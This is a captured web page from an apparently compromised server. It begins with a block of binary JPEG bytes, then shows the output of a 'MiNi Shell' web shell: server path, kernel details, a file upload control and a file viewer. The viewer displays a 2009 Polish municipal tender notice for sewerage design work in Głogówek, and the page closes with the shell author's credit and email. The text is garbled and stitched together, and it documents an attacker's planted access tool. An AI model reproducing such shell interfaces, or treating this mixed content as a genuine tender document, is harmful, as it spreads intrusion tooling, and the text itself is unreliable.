JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090223/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090223/37726-N-2009.html

<p class="kh_header"><b>Głogówek: Budowa Kanalizacji Sanitarnej dla Aglomeracji Głogówek w miejscowościach: Głogówek ul. Zbożowa i Bończyka, Stare Kotkowice, Biedrzychowice, Zwiastowice i Twardawa wraz z poprawą gospodarki osadowej na oczyszczalni ścieków w Głogówku.</b><br>
<b>Numer ogłoszenia: 37726 - 2009; data zamieszczenia: 23.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Głogówku , ul. Rynek 1, 48-250 Głogówek, woj. opolskie, tel. 077 4069900, 4069915, faks 077 4069906.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.glogowek.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa Kanalizacji Sanitarnej dla Aglomeracji Głogówek w miejscowościach: Głogówek ul. Zbożowa i Bończyka, Stare Kotkowice, Biedrzychowice, Zwiastowice i Twardawa wraz z poprawą gospodarki osadowej na oczyszczalni ścieków w Głogówku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Określenie przedmiotu oraz wielkości lub zakresu zamówienia: Przedmiotem niniejszego zamówienia jest:Wykonanie kompletnej dokumentacji projektowo kosztorysowej dla projektu: Budowa Kanalizacji Sanitarnej dla Aglomeracji Głogówek w miejscowościach:Głogówek ul. Zbożowa i Bończyka, Stare Kotkowice, Biedrzychowice, Zwiastowice i Twardawa wraz z poprawą gospodarki osadowej na oczyszczalni ścieków w Głogówku.Zamówienie składa się z następujących zadań: Zadanie 1: Budowa kanalizacji sanitarnej w miejscowości Głogówek ul. Zbożowa i ul. Bończyka, Zadanie 2: Budowa kanalizacji sanitarnej w miejscowości Stare Kotkowicz, Zadanie 3: Budowa kanalizacji sanitarnej w miejscowości Biedrzychowice, Zadanie 4: 	Budowa kanalizacji sanitarnej w miejscowości Zwiastowice, Zadanie 5: Budowa kanalizacji sanitarnej w miejscowości Twardawa, Zadanie 6: Poprawa gospodarki osadowej na oczyszczalni ścieków w Głogówku. Sporządzenie wniosków aplikacyjnych o środki finansowe z załącznikami. Przedsięwzięcie powinno być wykonane od początku do końca w ścisłym powiązaniu realizowanych zadań do odbioru końcowego i przekazania do użytku włącznie z zapewnieniem prawidłowości działania całości zrealizowanego projektu z zachowaniem okresu gwarancji i rękojmi. Zakres prac do wykonania dla powyższych zadań obejmuje: 1) Opracowanie kompletnej dokumentacji projektowej każdego zadania  (zadania nr 1 ÷ nr 6), obejmujące m. in.: a)Uzyskanie map do celów projektowych oraz wypisów z ewidencji gruntów oraz innych materiałów wyjściowych niezbędnych do wykonania przedmiotu zamówienia. b) Projekt budowlany oraz projekt wykonawczy dla wszystkich branż w zakresie niezbędnym do prawidłowej realizacji całego przedsięwzięcia. c) Uzyskanie w imieniu inwestora wszystkich wymaganych uzgodnień w tym także uzyskanie prawa do dysponowania gruntem na cele budowlane w formie umów cywilno-prawnych z właścicielami gruntu oraz opracowanie operatów geodezyjnych  z wyceną wartości gruntów działek niezbędnych do wykopu na cele komunalne  związane z tym przedsięwzięciem. d) Opracowanie i przygotowanie niezbędnej dokumentacji  i uzyskanie w imieniu inwestora wszystkich pozwoleń i uzgodnień oraz prawomocnych decyzji lokalizacji inwestycji celu publicznego, decyzji o środowiskowych uwarunkowaniach inwestycji a także prawomocnych decyzji: pozwolenia wodno prawnego i decyzji pozwolenia na budowę. e) Opracowanie raportu oddziaływania na środowisko oraz studium wykonalności,
 f) Opracowanie kosztorysu inwestorskiego dla wszystkich branż i kosztów pozostałych wraz ze zbiorczym zestawieniem kosztów oraz harmonogram rzeczowo finansowy  realizacji zadań całego przedsięwzięcia z podziałem na źródła finansowania wg. wzoru harmonogramu z WFOŚ, NWFOŚ znajdujących się na stronie internetowej WFOŚ i GW w Opolu. 
g) Wykonanie przedmiaru robót z podziałem na zakres rzeczowy podlegający dofinansowaniu z Funduszu Spójności i pozostały zakres obejmujący roboty wynikające z projektu. h) Sporządzenie informacji dotyczącej bezpieczeństwa i ochrony zdrowia. i) Wykonanie specyfikacji technicznych  wykonania i odbioru robót budowlanych, 
z podziałem na zakres rzeczowy podlegający dofinansowaniu z Funduszu Spójności 
i pozostały zakres obejmujący roboty wynikające z projektu. j) Wykonanie wymaganych opracowań kosztowych z podziałem na zakres rzeczowy podlegający dofinansowaniu z Funduszu Spójności i pozostały zakres obejmujący roboty wynikające z projektu. k) Opracowanie wyciągu z dokumentacji technicznej (projekt, opis techniczny, rysunki, zakres rzeczowy i przedmiary, również w wersji elektronicznej na płycie CD), wymaganego przy składaniu wniosków aplikacyjnych z planowanym zakresem rzeczowo-finansowym realizacji projektowych zadań przedsięwzięcia i ogłoszenia o przetargu na wykonanie. l) Opracowanie dokumentacji geotechnicznej i/lub geologiczno-inżynierskiej do realizacji inwestycji. 
m) Opracowanie projektów odbudowy nawierzchni dróg, chodników, placów i pozostałych.
n) Opracowanie projektów organizacji ruchu zastępczego na wszystkich drogach na czas budowy kanalizacji. o) Opracowanie innych projektów i uzyskanie uzgodnień, pozwoleń i decyzji nie wymienionych wyżej zapewniających prawidłowe i terminowe zrealizowanie planowanego przedsięwzięcia. p) Sporządzenie wniosku aplikacyjnego o środki finansowe z Funduszu Spójności, NFOŚ i WFOŚ zgodnie z wymogami dla projektów do realizacji w ramach POIiŚ Oś Priorytetowa I - Gospodarka Wodno Ściekowa do złożenia w terminach naboru. 2) Pełnienie nadzoru autorskiego
Zadania objęte przedmiotem zamówienia wchodzą w skład projektu: Budowa Kanalizacji Sanitarnej w Aglomeracji Głogówek w miejscowościach: Głogówek ul. Zbożowa i Bończyka, Stare Kotkowice, Biedrzychowice, Zwiastowice i Twardawa wraz z poprawą gospodarki osadowej na oczyszczalni ścieków w Głogówku na terenie gminy Głogówek, która ubiega się o dofinansowanie z Funduszu Spójności w ramach Programu Operacyjnego Infrastruktura i Środowisko Oś Priorytetowa I - Gospodarka Wodno Ściekowa (POIiŚ OP I - GWŚ). 
Aktualne wytyczne dla Beneficjentów Funduszu Spójności są dostępne na stronach internetowych instytucji zarządzających Funduszem Spójności tj. WFOŚiGW, NFOŚiGW, Ministerstwa Środowiska i Ministerstwa Rozwoju Regionalnego. Szczegółowy opis i zakres przedmiotu zamówienia przedstawiony został w Specyfikacji Istotnych Warunków Zamówienia SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 74.23.20.00-4, 74.23.22.20-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 10 000,00 zł, słownie: dziesięć tysięcy złotych<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 8.1 Wykonawcy ubiegający się o zamówienie publiczne muszą spełniać niżej wymienione warunki udziału w postępowaniu:1) posiadać uprawnienia do wykonywania działalności lub czynności jeżeli ustawy nakładają obowiązek posiadania takich uprawnień oraz nie podlegać wykluczeniu z postępowania na podstawie art. 22 i 24 ustawy Pzp. W celu potwierdzenia spełniania ww. warunków Wykonawcy zobowiązani są przedłożyć następujące dokumenty: a) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
b) aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4 ÷8 ustawy Pzp (karalność osób wskazanych w wymienionym przepisie), wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, c) aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy Pzp (karalność podmiotów zbiorowych tj. osób prawnych oraz jednostek organizacyjnych nie mających osobowości prawnej - nie dotyczy osób fizycznych i spółek cywilnych), wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, d) aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. e) oświadczenie, sporządzone według wzoru stanowiącego Załącznik nr 2 do niniejszej SIWZ, o spełnianiu warunków udziału w postępowaniu.W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty wymienione w pkt. 8.1 ppkt 1) lit. a) ÷ d) musi złożyć każdy z nich, natomiast dokument wymieniony w pkt. 8.1 ppkt 1) lit. e) mogą złożyć łącznie. 2) posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem technicznym i osobami zdolnymi do wykonania niniejszego zamówienia, tj. Wykonawca musi spełniać następujące warunki (w przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia warunek dotyczący potencjału technicznego i kadrowego oraz kwalifikacji i doświadczenia muszą spełniać łącznie Wykonawcy wspólnie ubiegający się o udzielenie zamówienia):a) wskaże do uczestniczenia w wykonaniu niniejszego zamówienia następujące osoby wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnymi do wykonania zamówienia a także zakresu wykonywania przez nich czynności. (Wykonawca może zaproponować tą samą osobę do pełnienia różnych funkcji, oprócz sytuacji gdy projektantem i sprawdzającym jest ta sama osoba danej specjalności):-Projektanta nr 1 posiadającego uprawnienia budowlane do projektowania w specjalności drogowej wraz z aktualną na dzień otwarcia ofert przynależnością do właściwej Izby Samorządu Zawodowego;
-Projektanta nr 2 posiadającego uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych wraz z aktualną na dzień otwarcia ofert przynależnością do właściwej Izby Samorządu Zawodowego. Jednocześnie będzie on pełnił funkcję Przedstawiciela Wykonawcy przy realizacji przedmiotu umowy; -Projektanta nr 3 posiadającego uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych wraz z aktualną na dzień otwarcia ofert przynależnością do właściwej Izby Samorządu Zawodowego;
- Sprawdzającego nr 1 posiadającego uprawnienia budowlane do projektowania w specjalności drogowej wraz z aktualną na dzień otwarcia ofert przynależnością do właściwej Izby Samorządu Zawodowego; -Sprawdzającego nr 2 posiadającego uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych wraz z aktualną na dzień otwarcia ofert przynależnością do właściwej Izby Samorządu Zawodowego;
-Sprawdzającego nr 3 posiadającego uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych 
i elektroenergetycznych wraz z aktualną na dzień otwarcia ofert przynależnością do właściwej Izby Samorządu Zawodowego. W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć: wykaz osób, które będą uczestniczyć w wykonaniu niniejszego zamówienia sporządzony według wzoru stanowiącego załącznik nr 4 do niniejszej SIWZ oraz dokumenty stwierdzające, że powyższe osoby posiadają odpowiednie uprawnienia budowlane oraz są członkami właściwej izby samorządu zawodowego; zarówno uprawnienia budowlane wg aktualnego stanu prawnego jak i odpowiadające im ważne uprawnienia budowlane wydane na podstawie wcześniejszych przepisów wyczerpują wymagania Zamawiającego w przypadku, gdy są wystarczające na danym stanowisku do wykonywania wszystkich prac przewidzianych w niniejszym zamówieniu dla danej specjalności.
b) wykonać w okresie ostatnich trzech lat (licząc od dnia wszczęcia postępowania o udzielenie zamówienia), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej: jedną dokumentację projektową dla sieci kanalizacji sanitarnej i deszczowej wraz z przepompowniami ścieków o długości sieci porównywalnej z przedmiotem zamówienia oraz projekt budowy lub modernizacji oczyszczalni ścieków. W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć ,,Wykaz wykonanych usług sporządzony według wzoru stanowiącego Załącznik nr 3 do niniejszej SIWZ oraz oryginały lub poświadczone przez wykonawcę ,,za zgodność z oryginałem kopie dokumentów wystawionych przez odbiorcę (odbiorców) potwierdzające, że usługi te zostały wykonane należycie (referencje); 3). znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia, tj. Wykonawca musi spełniać następujący warunek (w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunek ten musi być spełniony łącznie przez tych Wykonawców):
posiadać środki finansowe lub zdolność kredytową co najmniej w wysokości jak niżej:
Zadanie 1 - 6 000 zł-Zadanie 2 - 46 000 zł-Zadanie 3 - 70 000 zł - Zadanie 4 - 26 000 zł
Zadanie 5  - 55 000 zł - Zadanie 6 - 32 000 zł - Razem:-235 000 zł. Uwaga! Środki finansowe lub zdolność kredytowa dotyczy wszystkich zadań i wynosi razem 235 000 zł. W przypadku złożenia przez Wykonawców dokumentów zawierających dane w innej walucie niż PLN, Zamawiający jako kurs przeliczeniowy waluty, w której oszacowano warunki finansowo-ekonomiczne przyjmie średni kurs NBP z dnia opublikowania ogłoszenia o przetargu.
Ten sam kurs Zamawiający przyjmie przy przeliczaniu wszelkich innych danych finansowych. W celu potwierdzenia spełniania niniejszego warunku Wykonawcy (w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ci Wykonawcy, którzy w imieniu wszystkich wykazywać będą spełnianie tego warunku) zobowiązani są przedłożyć informację z banku lub spółdzielczej kasy oszczędnościowo- kredytowej, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, w którym wykonawcy posiadają rachunek, potwierdzające posiadanie środków finansowych w wymaganej wysokości lub posiadanie przez Wykonawcę zdolności kredytowej w wymaganej wysokości (w przypadku Wykonawców składających ofertę wspólną powinni oni łącznie spełniać powyższy warunek). 8.2 Stosownie do treści § 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. (Dz. U. Nr 87, poz. 605) w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane, jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa powyżej:
1)w pkt. 8.1 ppkt 1) a) c) d), składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: a) nie otwarto jego likwidacji ani nie ogłoszono upadłości; b) nie orzeczono wobec niego zakazu ubiegania się o zamówienie; c) nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie zdrowotne i społeczne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; 2)w pkt. 8.1 ppkt 1) b), składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt. 4-8 ustawy Pzp; 3)dokumenty,  o  których  mowa  powyżej  w  pkt  8.2 ppkt 1) a), b) powinny  być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 4)dokument, o którym mowa powyżej w pkt  8.2 ppkt 1) c), powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; 5)jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie  wydaje się dokumentów, o których mowa  powyżej tj. pkt  8.2 ppkt 1), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub  kraju,  w  którym  Wykonawca  ma siedzibę lub miejsce zamieszkania. Oświadczenie takie nie może być wystawione wcześniej niż odpowiednio 6 i 3 miesiące przed upływem terminu składania ofert (odpowiednio  do wskazanych w ppkt. 3) i 4) terminów wystawienia dokumentu, który oświadczenie ma zastąpić.8.3 Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: (spełnia nie spełnia). Nie spełnienie chociażby jednego z warunków spowoduje wykluczenie Wykonawcy z postępowania.9. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia. 9.1. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą spełniać warunki udziału w postępowaniu oraz złożyć dokumenty potwierdzające spełnianie tych warunków, zgodnie z postanowieniami zawartymi w pkt. 9 niniejszej SIWZ. Ponadto tacy Wykonawcy mają obowiązek ustanowić Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w niniejszym postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Zaleca się, aby Pełnomocnikiem był jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Pełnomocnictwo może być udzielone w szczególności: a) łącznie przez wszystkich Wykonawców (jeden dokument), b) oddzielnie przez każdego z nich (tyle dokumentów ilu Wykonawców). W każdym jednak przypadku w treści dokumentu lub pełnomocnictwa zaleca się wymienić wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia i wskazać ich Pełnomocnika odpowiedzialnego za realizację przedmiotu zamówienia. Pełnomocnictwo powinno zostać dołączone do oferty.
9.2.Wszelką korespondencję Zamawiający będzie prowadził wyłącznie z Pełnomocnikiem.
9.3.Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie przedmiotu zamówienia. Ocena spełnienia ww. warunków dokonana zostanie na podstawie złożonych dokumentów. Oferty które nie spełnią wymienionych i zawartych w SIWZ warunków lub nie zawierają dokumentów potwierdzających ich spełnienie zostaną odrzucone..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu: 1) Kompletna oferta musi zawierać: a) Formularz Oferty, sporządzony zgodnie z wzorem stanowiącym Załącznik nr 1 do niniejszej SIWZ wraz z Załącznikiem 1a Kalkulacja ceny Ofertowej, b)Oświadczenie Wykonawcy(ców) o spełnianiu warunków udziału w postępowaniu, sporządzone na podstawie wzoru stanowiącego Załącznik nr 2 do niniejszej SIWZ, c) Wykaz wykonanych usług sporządzony na podstawie wzoru stanowiącego Załącznik nr 3 do niniejszej SIWZ,
d)Wykaz osób wraz z ich kwalifikacjami i doświadczeniem, które będą wykonywać niniejsze zamówienie na podstawie wzoru stanowiącego Załącznik nr 4. e)stosowne pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej. f) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego, g) dowód wniesienia wadium, h) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, i) aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4 ÷8 ustawy Pzp (karalność osób wskazanych w wymienionym przepisie), wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, j) aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy Pzp (karalność podmiotów zbiorowych tj. osób prawnych oraz jednostek organizacyjnych nie mających osobowości prawnej - nie dotyczy osób fizycznych i spółek cywilnych), wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, k) aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, l) informację z banku lub spółdzielczej kasy oszczędnościowo-kredytowej o zdolności kredytowej, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, w którym wykonawcy posiadają rachunek, potwierdzająca posiadanie środków finansowych w wymaganej wysokości lub posiadanie przez Wykonawcę zdolności kredytowej w wymaganej wysokości (w przypadku Wykonawców składających ofertę wspólną powinni oni łączne  spłacić powyższy rachunek)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.glogowek.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Głogówku ul. Rynek 1, 48-250 Głogóówek (pokój nr 18 I piętro).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.03.2009 godzina 10:00, miejsce: Urząd Miejski w Głogówku, ul. Rynek 1, 48-250 Głogówek (pokój nr 13- sekretariat Urzędu). Otwarcie ofert: 16.03.2009r. o godzinie 10:15, miejsce otwarcia Urząd Miejski w Głogówku - sala, II piętro..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com